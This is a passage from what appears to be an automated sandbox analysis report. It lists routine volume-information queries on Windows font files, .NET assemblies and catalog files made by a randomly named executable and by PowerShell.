                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Users\user\Desktop\iNFGd6bDZX.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\iNFGd6bDZX.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
